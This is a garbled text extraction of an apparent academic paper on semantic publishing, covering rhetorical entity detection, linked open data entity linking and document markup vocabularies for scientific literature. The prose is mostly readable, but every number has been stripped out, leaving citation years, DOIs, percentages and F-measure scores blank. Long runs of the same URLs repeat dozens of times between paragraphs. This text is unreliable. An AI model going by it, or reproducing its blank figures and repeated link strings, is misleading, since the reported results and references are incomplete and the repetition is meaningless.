http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab https://github.com/semanticsoftwarelab http://dx.doi.org/ . /peerj-cs. subjects artificial intelligence, digital libraries, natural language and speech keywords natural language processing, semantic web, semantic publishing introduction in a commentary for the nature journal, berners-lee & hendler ( ) predicted that the new semantic web technologies “may change the way scientific knowledge is produced and shared.” they envisioned the concept of “machine-understandable documents,” where machine-readable metadata is added to articles in order to explicitly mark up the data, experiments and rhetorical elements in their raw text. more than a decade later, not only is the wealth of existing publications still without annotations, but nearly all new research papers still lack semantic metadata as well. manual efforts for adding machine-readable metadata to existing publications are simply too costly for wide-spread adoption. hence, we investigate what kind of semantic markup can be automatically generated for research publications, in order to realize some of the envisioned benefits of semantically annotated research literature. as part of this work, we first need to identify semantic markup that can actually help to improve specific tasks for the scientific community. a survey by naak, hage & aimeur ( ) revealed that when locating papers, researchers consider two factors when assessing the relevance of a document to their information need, namely, the content and quality of the paper. they argue that a single rating value cannot represent the overall quality of a given research paper, since such a criteria can be relative to the objective of the researcher. for example, a researcher who is looking for implementation details of a specific approach is interested mostly in the implementation section of an article and will give a higher ranking to documents with detailed technical information, rather than related documents with modest implementation details and more theoretical contributions. therefore, a lower ranking score does not necessarily mean that the document has an overall lower (scientific) quality, but rather that its content does not satisfy the user’s current information need. consequently, to support users in their concrete tasks involving scientific literature, we need to go beyond standard information retrieval methods, such as keyword-based search, by taking a user’s current information need into account. our vision (fig. ) is to offer support for semantically rich queries that users can ask from a knowledge base of scientific literature, including specific questions about the contributions of a publication or the discussion of specific entities, like an algorithm. for example, a user might want to ask the question “show me all full papers from the sepublica workshops, which contain a contribution involving ‘linked data.”’ we argue that this can be achieved with a novel combination of three approaches: natural language processing (nlp), linked open data (lod)-based entity detection, and semantic vocabularies for automated knowledge base construction (we discuss these methods in our ‘background’ section below). by applying nlp techniques for rhetorical entity (re) recognition to scientific documents, we can detect which text fragments form sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure this diagram shows our visionary workflow to extract the knowledge contained in scientific literature by means of natural language processing (nlp), so that researchers can interact with a semantic knowledge base instead of isolated documents. a rhetorical entity, like a contribution or claim. by themselves, these res provide support for use cases such as summarization (teufel & moens, ), but cannot answer what precisely a contribution is about. we hypothesize that the named entities (nes) present in a document (e.g., algorithms, methods, technologies) can help locate relevant publications for a user’s task. however, manually curating and updating all these possible entities for an automated nlp detection system is not a scalable solution either. instead, we aim to leverage the linked open data cloud (heath & bizer, ), which already provides a continually updated source of a wealth of knowledge across nearly every domain, with explicit and machine-readable semantics. if we can link entities detected in research papers to lod uris (universal resource identifiers), we can semantically query a knowledge base for all papers on a specific topic (i.e., a uri), even when that topic is not mentioned literally in a text: for example, we could find a paper for the topic “linked data,” even when it only mentions “linked open data,” or even “lod,” since they are semantically related in the db- pedia ontology (dbpedia ontology, http://wiki.dbpedia.org/services-resources/ontology). but linked nes alone again do not help in precisely identifying literature for a specific task: did the paper actually make a new contribution about “linked data,” or just mention it as an application example? our idea is that by combining the res with the lod nes, we can answer questions like these in a more precise fashion than either technique alone. to test these hypotheses, we developed a fully-automated approach that transforms publications and their nlp analysis results into a knowledge base in rdf (resource de- scription framework, http://www.w .org/rdf) format, based on a shared vocabulary, so that they can take part in semantically rich queries and ontology-based reasoning. we eval- uate the performance of this approach on several volumes of computer science conference and workshop proceedings and journal articles. note that all queries and results shown in this paper can be verified by visiting the paper’s supplementary material webpage at http:// www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://wiki.dbpedia.org/services-resources/ontology http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.w .org/rdf http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://dx.doi.org/ . /peerj-cs. background our work is based on three foundations: nlp techniques for rhetorical entity detection, named entity recognition in linked open data, and vocabularies for semantic markup of scientific documents. rhetorical entities in the context of scientific literature, rhetorical entities (res) are spans of text in a document (sentences, passages, sections, etc.), where authors convey their findings, like claims or arguments, to the readers. res are usually situated in certain parts of a document, depending on their role. for example, the authors’ claims are typically mentioned in the abstract, introduction or conclusion section of a paper, and seldom in the background. this conforms with the researchers’ habit in both reading and writing scientific articles. indeed, according to a recent survey (naak, hage & aimeur, ), researchers stated that they are interested in specific parts of an article when searching for literature, depending on their task at hand. verbatim extraction of res from text helps to efficiently allocate the attention of humans when reading a paper, as well as improving retrieval mechanisms by finding documents based on their res (e.g., “give me all papers with implementation details”). they can also help to narrow down the scope of subsequent knowledge extraction tasks by determining zones of text where further analysis is needed. existing works in automatic re extraction are mostly based on the rhetorical structure theory (rst) (mann & thompson, ) that characterizes fragments of text and the relations that hold between them, such as contrast or circumstance. marcu ( ) developed a rhetorical parser that derives the discourse structure from unrestricted text and uses a decision tree to extract elementary discourse units (edus) from text. the work by teufel ( ) identifies so-called argumentative zones (az) from scientific text as a group of sentences with the same rhetorical role. she uses statistical machine learning models and sentential features to extract azs from a document. teufel’s approach achieves a raw agreement of % with human annotations as the upper bound, using a naı̈ve bayes classifier. applications of azs include document management and automatic summarization tasks. in recent years, work on re recognition has been largely limited to biomedical and chemical documents. blake ( ) introduced the claim framework to differentiate levels of evidence, such as comparisons and observations, in implicit and explicit claims in biomedical domain literature. the hypothesisfinder (malhotra et al., ) uses machine learning techniques to classify sentences in scientific literature in order to find speculative sentences. combined with an ontology to find named entities in text, hypothesisfinder can establish hypothetical links between statements and their concepts in the given ontology. the jisc-funded art project aimed at creating an “intelligent digital library,” where the explicit semantics of scientific papers is extracted and stored using an ontology-based annotation tool. the project produced sapient (semantic annotation of papers: interface & enrichment tool; http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/), a sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://www.aber.ac.uk/en/cs/research/cb/projects/art/software/ http://dx.doi.org/ . /peerj-cs. web-based tool to help users annotate experiments in scientific papers with a set of general specific concepts (gsc) (liakata & soldatova, ). the development of sapient was eventually succeeded by the sapienta (sapient automation) tool (liakata et al., ) that uses machine learning techniques to automatically annotate chemistry papers using the art corpus as the training model. sapienta’s machine learning approach has achieved an f-measure of . , . and . on the automatic detection of experiments, background and models (approaches) from chemistry papers, respectively. document markup vocabularies an essential requirement for the semantic publishing process is the existence of controlled vocabularies that mandate the use of pre-defined terms to describe units of information with formalized, unambiguous meaning for machines. in scientific literature mining, controlled vocabularies are implemented in form of markup languages, like xml. based on the chosen markup language, documents can be annotated for their structure and rhetorical elements, in either a manual or automatic fashion. structural markup prior to the analysis of scientific literature for their latent knowledge, we first need to provide the foundation for a common representation of documents, so that (i) the variations of their formats (e.g., html, pdf, latex) and publisher-specific markup can be converted to one unified structure; and (ii) various segments of a document required for further processing are explicitly marked up, e.g., by separating references from the document’s main matter. a notable example is scixml (rupp et al., ), which is an xml-based markup language for domain-independent research papers. it contains a set of vocabularies that separate a document into sections that may themselves contain references, footnotes, theorems and floats, like tables and figures. scixml also provides a stand-off annotation format to represent various linguistic metadata of a given document, in stand-off annotation style, the original text and its annotations are separated into two different parts and connected using text offsets. for example, for encoding chemical terms. the open annotation model (oam) (sanderson et al., ) is an interoperable open annotation model, http://www. openannotation.org/spec/core/ framework aiming towards a common specification of an annotation schema for digital resources in rdf format. the focus of the oam is on sharing annotations for scholarly purposes with a baseline model of only three classes: a target being annotated, a body of information about the target, and an annotation class that describes the relationship between the body and target, all with de-referenceable uris. most of the existing annotation schemas, like scixml, treat documents as semantically unrelated fragments of text, whereas in scientific literature this is obviously not the case: sections of a scientific article follow a logical, argumentative order (teufel, ). peroni ( ) has a similar observation and makes a distinction between xml-like languages for document markup on the one hand and semantic markup, like rdf, on the other hand. he argues that document markup languages leave the semantics of the content to the human interpretation and lack “expressiveness for the multiple and overlapping markup on the same text.” as a semantic solution, di iorio, peroni & vitali ( ) introduced the earmark markup metalanguage that models documents as collections of addressable text fragments sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://dx.doi.org/ . /peerj-cs. and associates their content with owl assertions to describe their structural and semantic properties. similarly, constantin et al. (in press) authored the doco ontology—as the document components ontology (doco), http://purl.org/spar/doco part of the spar (semantic publishing and referencing) ontology family (http://www. sparontologies.net; shotton et al., )—that defines components of bibliographic documents, like figures and references, enabling their description in rdf format. rhetorical entity markup in recent years, the semantic publishing community increasingly focused on developing vocabularies based on w c standards, such as rdfs and owl ontologies, for the semantic description of research publications. salt (groza et al., a) is a framework for the semantic annotation of scientific literature. it comprises three ontologies: a document ontology that defines entities like text blocks, abstract and title; a rhetorical ontology that defines concepts like claims, salt rhetorical ontology (sro), http://lov.okfn.org/dataset/lov/ detailsvocabulary sro.html explanations and results; and an annotation ontology that provides the means to attach syntactic and semantic markup to the document. in the early versions of the salt framework, the embedded semantic markup was extracted from the manuscript in the compilation phase and visualized in html pages generated from the document metadata. the salt framework has been extended and adapted for extracting claims from text with the ultimate goal of creating a knowledge network from scientific publications in the konnexsalt system (groza et al., ), which provides support for (manual) identification, referencing and querying of claims in a collection of documents. groza et al. extended their rhetorical ontology with concepts, such as generalizations of claims and their related text chunks, to provide for identifying claims with possible multiple representations across a dataset. they also introduced a bibtex-like referencing system (groza et al., b) for the citation of claims that can be incorporated into the latex environment using special commands, as well as queried using a web interface. coresc (liakata et al., ) takes on a different approach of annotating scientific documents. it treats scientific literature as a human readable representation of scientific investigations and therefore, has a vocabulary that pertains to the structure of an investigation, like experiment or observation. coresc is itself a subpart of the expo ontology (soldatova et al., ), a comprehensive vocabulary for defining scientific experiments, like proposition or substrate. while ontologies like salt or az-ii (teufel, siddharthan & batchelor, ) focus on the rhetorical structure of a document, ontologies like coresc and expo are used for supporting reproducibility in various domains, like chemistry or the omics sciences. named entity linking an active research area in the semantic web community is concerned with recognizing en- tities in text and linking them to the lod cloud (heath & bizer, ). this task is related to, but different from named entity recognition (ner) as traditionally performed in nlp in two aspects: first, only entities described on the lod are discovered (e.g., a city name not present on an lod source would not be detected, even if an nlp method could identify it as such) and second, each entity must be linked to a unique uri on the lod cloud. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://purl.org/spar/doco http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://www.sparontologies.net http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html http://lov.okfn.org/dataset/lov/detailsvocabulary_sro.html 